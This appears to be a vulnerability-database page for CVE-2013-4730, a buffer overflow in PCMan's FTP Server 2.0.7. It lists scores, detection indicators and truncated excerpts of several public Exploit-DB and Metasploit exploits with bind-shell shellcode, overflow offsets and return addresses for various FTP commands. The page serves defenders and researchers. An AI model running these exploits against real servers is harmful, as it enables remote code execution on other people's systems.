CVE-2013-4730
published 2014-05-15CVE-2013-4730: Buffer overflow in PCMan's FTP Server 2.0.7 allows remote attackers to execute arbitrary code via a long string in a USER command.
PriorityP269critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
67.23%
99.2th percentile
Buffer overflow in PCMan's FTP Server 2.0.7 allows remote attackers to execute arbitrary code via a long string in a USER command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pcman_s_ftp_server_project | pcman_s_ftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x53\x02\x67\x75
bytes↗
0x7e429353
bytes↗
220 PCMan's FTP Server 2.0 Ready.
bytes↗
0x7C91FCD8
bytes↗
\x83\xc4\x9c
bytes↗
220 PCMan's FTP Server 2.0
bytes↗
\xDB\xFC\x1C\x75
bytes↗
\x65\x82\xA5\x7C
bytes↗
\x59\x06\xbb\x76
- →Detect FTP USER command with payload exceeding 2005 bytes — characteristic of PCMan FTP USER overflow exploitation ↗
- →Detect FTP PASS command with payload exceeding 6102 bytes — characteristic of PCMan FTP PASS overflow exploitation ↗
- →Detect FTP STOR command containing '/../' followed by a large buffer — characteristic of PCMan FTP STOR overflow exploitation ↗
- →Detect FTP MKD command with payload exceeding 2007 bytes — characteristic of PCMan FTP MKD overflow exploitation ↗
- →Detect FTP CWD command with payload exceeding 2012 bytes — characteristic of PCMan FTP CWD overflow exploitation ↗
- →Flag FTP server banners matching '220 PCMan's FTP Server 2.0' as vulnerable to multiple buffer overflow commands (USER, PASS, STOR, MKD, CWD) ↗
- →Bad characters for payload crafting against PCMan FTP USER command are \x53\x93\x42\x7E — filter/alert on FTP USER payloads avoiding these bytes ↗
- →Bad characters for STOR command exploit are \x00\xff\x0a\x0d\x20\x40 — useful for distinguishing crafted payloads in FTP traffic ↗
- ·The CALL ESP ROP gadget address (0x75670253 / Kernel32.dll) used in the PASS exploit is Windows 7 SP1 French-specific and will differ on other OS versions/languages ↗
- ·The USER exploit RET address (0x7e429353, push esp/ret) targets Windows XP SP3 English only; the NVD entry notes RET needs adjustment for other targets ↗
- ·The STOR exploit RET address (0x7C91FCD8, jmp esp from kernel32.dll) and offset (2002) are specific to Windows XP SP3 ↗
- ·The MKD exploit RET address (0x7CA58265, jmp esp from shell32.dll) is specific to Windows XP SP3; will not apply to other platforms ↗
- ·The CWD exploit ESP address (0x76BB0659) is specific to Windows 7 SP1 x64 English; offsets and gadget addresses will differ on other targets ↗
- ·Multiple FTP commands are vulnerable (USER, PASS, STOR, MKD, CWD); CVE-2013-4730 is formally attributed to USER but exploitation extends to other commands ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow
exploitdb·2015-08-29
CVE-2013-4730 PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow
PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow
---
#!/usr/bin/python
# Exploit Title: PCMan's FTP Server v2.0 - RENAME command remote buffer overflow
# Date: 29 Aug 2015
# Exploit Author: Koby
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z
# Version: 2.0.7
# Tested on: Windows XP SP3
import socket
import sys
# msfvenom -p windows/shell_bind_tcp lhost=192.168.1.130 lport=4444 -b '\x00\x0a\x0b\x27\x36\xce\xc1\x04\x14\x3a\x44\xe0\x42\xa9\x0d' -f ruby
# Payload size: 352 bytes
shellcode = (
"\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\xb3\x93\xd2\x17\x83\xee\xfc\xe2\xf4\x4f\x7b\x50\x17"
"\xb3\x93\xb2\x9e\x56\xa2\x12\x73\x38\xc3\xe2\x9c\xe1\x9f"
"\x59\x45\xa7\x18\xa0\x3
Exploit-DB
PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
exploitdb·2015-02-14
CVE-2013-4730 PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
---
# Title: PCMan FTP Server v2.0.7 Buffer Overflow - MKD Command
# Date : 12/02/2015
# Author: R-73eN
# Software: PCMan FTP Server v2.0.7
# Tested On Windows Xp SP3
import socket
#348 Bytes Bind Shell Port TCP/4444
shellcode = "\xdb\xcc\xba\x40\xb6\x7d\xba\xd9\x74\x24\xf4\x58\x29\xc9"
shellcode += "\xb1\x50\x31\x50\x18\x03\x50\x18\x83\xe8\xbc\x54\x88\x46"
shellcode += "\x56\x72\x3e\x5f\x5f\x7b\x3e\x60\xff\x0f\xad\xbb\xdb\x84"
shellcode += "\x6b\xf8\xa8\xe7\x76\x78\xaf\xf8\xf2\x37\xb7\x8d\x5a\xe8"
shellcode += "\xc6\x7a\x2d\x63\xfc\xf7\xaf\x9d\xcd\xc7\x29\xcd\xa9\x08"
shellcode += "\x3d\x09\x70\x42\xb3\x14\xb0\xb8\x38\x2d\x60\x1b\xe9\x27"
shellcode += "\x6d\xe8\xb6\xe3\x6c\x04\x2e\x67\x62\x91\x24\x28\x66\x24"
shellcode += "\xd0\xd4
Exploit-DB
PCMan FTP Server 2.07 - Remote Buffer Overflow
exploitdb·2014-02-20
CVE-2013-4730 PCMan FTP Server 2.07 - Remote Buffer Overflow
PCMan FTP Server 2.07 - Remote Buffer Overflow
---
# Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow (unauthenticated)
# Date: Feb 19, 2014
# Exploit Author: Sumit
# Version: 2.07
# Tested on: Windows XP Professional SP3
# Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command
#
import socket
import datetime
"""
You have to take into account your IP addr and servers date (if using NAT, check external IP) as buffer starts like the following:
2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
"""
host = '192.168.213.10'
d = str(datetime.da
Exploit-DB
PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow
exploitdb·2014-01-29
CVE-2013-4730 PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow
PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow
---
# Exploit Title: PCMAN FTP 2.07 CWD Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
# Email: [email protected]
import socket as s
from sys import argv
#
if(len(argv) != 4):
print "USAGE: %s host " % argv[0]
exit(1)
else:
#store command line arguments
script,host,fuser,fpass=argv
#vars
junk = '\x41' * 2012 #overwrite function (CWD) with garbage/junk chars
espaddress = '\x59\x06\xbb\x76' # 76BB0659
nops = '\x90' * 10
shellcode = ( # BIND SHELL | PORT 4444
"\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
Exploit-DB
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
exploitdb·2014-01-29
CVE-2013-4730 PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
---
# Exploit Title: PCMAN FTP 2.07 ABOR Command Buffer Overflow
# Date: Jan 25,2014
# Exploit Author: Mahmod Mahajna (Mahy)
# Version: 2.07
# Tested on: Windows 7 sp1 x64 (english)
# Email: [email protected]
import socket as s
from sys import argv
#
if(len(argv) != 4):
print "USAGE: %s host " % argv[0]
exit(1)
else:
#store command line arguments
script,host,fuser,fpass=argv
#vars
junk = '\x41' * 2011 #overwrite function (ABOR) with garbage/junk chars
espaddress = '\x59\x06\xbb\x76' # 76BB0659
nops = '\x90' * 10
shellcode = ( # BIND SHELL | PORT 4444
"\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x
Exploit-DB
PCMan FTP Server 2.07 - 'STOR' Remote Stack Overflow (Metasploit)
exploitdb·2013-09-17
CVE-2013-4730 PCMan FTP Server 2.07 - 'STOR' Remote Stack Overflow (Metasploit)
PCMan FTP Server 2.07 - 'STOR' Remote Stack Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'PCMAN FTP Server STOR Command Stack Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability
found in the STOR command of the PCMAN FTP v2.07 Server
when the "/../" parameters are also sent to the server.
},
'Author' => [
'Christian (Polunchis) Ramirez', # Initial Discovery
'Rick (nanotechz9l) Flores', # Metasploit Module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.exp
Exploit-DB
PCMan FTP Server 2.07 - 'STOR' Remote Buffer Overflow
exploitdb·2013-08-19
CVE-2013-4730 PCMan FTP Server 2.07 - 'STOR' Remote Buffer Overflow
PCMan FTP Server 2.07 - 'STOR' Remote Buffer Overflow
---
#!/usr/bin/python
# Exploit Title: PCMAN FTP 2.07 STOR Command - buffer overflow
# Date: 18 Agosto 2013
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org
# Contact: [email protected]
# Version: PCMAN FTP 2.07 STOR Command
# Tested on: Windows XP SP3, Spanish
# Thanks:To GOD for giving me wisdom
#
# Description:
# A buffer overflow is triggered when a long STOR command is sent to the server continued of these /../ parameters
import socket, sys, os, time
if len(sys.argv) != 3:
print "[*] Uso: %s \n" % sys.argv[0]
print "[*] Exploit created by Polunchis"
print "[*] https://www.intrusionlabs.org"
sys.exit(0)
target = sys.argv[1]
port = int(sys.argv[2])
#msfpayload windows/shell_bind_tcp LPORT=2887
Exploit-DB
PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow
exploitdb·2013-08-02
CVE-2013-4730 PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow
PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow
---
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
"""
PCMAN FTPD 2.07 PASS Command Buffer Overflow
Author: Ottomatik
Date: 2013-07-31
Software : PCMAN FTPD
Version : 2.07
Tested On: Windows 7 SP1 - French;
Description:
* The PASS Command is vulnerable to a buffer overflow;
* Other commads may be vulnerable;
"""
# Modules import;
import socket
def main() :
"""
Main function;
"""
buf = "PASS "
buf += "A" * 6102 # JUNK
# 0x75670253
buf += "\x53\x02\x67\x75" # @ CALL ESP Kernel32.dll
buf += "\x90" * 40 # NOPs
# ShellCode : msfpayload windows_exec calc.exe, bad chars = 00,0A,0C,0D
buf +=("\xdd\xc5\xd9\x74\x24\xf4\x5a\x31\xc9\xb8\xd1\x96\xc1\xcb\xb1"
"\x33\x31\x42\x17\x83\xc2\x04\x03\x93\x85\x23\x3e\xef\x42\x2a"
"\xc1\x0f\x93\x4d\x4b\
Exploit-DB
PCMan FTP Server 2.0.7 - Remote (Metasploit)
exploitdb·2013-07-22
CVE-2013-4730 PCMan FTP Server 2.0.7 - Remote (Metasploit)
PCMan FTP Server 2.0.7 - Remote (Metasploit)
---
# Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'PCMan\'s FTPD V2.0.7 Username Overflow',
'Description' => %q{
This module exploits a buffer overflow found in the USER command
of PCMan's FTPD.
},
'Author' => 'MSJ ',
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 2005,
'BadChars' => "\x53\x93\x42\x7E",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Target 0
[
'Windows XP SP3 En
Exploit-DB
PCMan FTP Server 2.0 - Remote Buffer Overflow
exploitdb·2013-06-30
CVE-2013-4730 PCMan FTP Server 2.0 - Remote Buffer Overflow
PCMan FTP Server 2.0 - Remote Buffer Overflow
---
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
USER = "anonymous"
PASSWD = "TEST"
PAYLOAD = "\x41" * 2010
EIP = "\xDB\xFC\x1
Metasploit
PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow
metasploit
PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow
PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow
This module exploits a buffer overflow vulnerability found in the STOR command of the PCMAN FTP v2.07 Server when the "/../" parameters are also sent to the server. Please note authentication is required in order to trigger the vulnerability. The overflowing string will also be seen on the FTP server log console.
Metasploit
PCMAN FTP Server Buffer Overflow - PUT Command
metasploit
PCMAN FTP Server Buffer Overflow - PUT Command
PCMAN FTP Server Buffer Overflow - PUT Command
This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous credentials are enabled.
No writeups or analysis indexed.
http://infosec42.blogspot.com/2013/06/unauthenticated-pcman-ftp-207-buffer.htmlhttp://osvdb.org/show/osvdb/94624http://www.exploit-db.com/exploits/26471http://www.securityfocus.com/bid/60837http://infosec42.blogspot.com/2013/06/unauthenticated-pcman-ftp-207-buffer.htmlhttp://osvdb.org/show/osvdb/94624http://www.exploit-db.com/exploits/26471http://www.securityfocus.com/bid/60837
2014-05-15
Published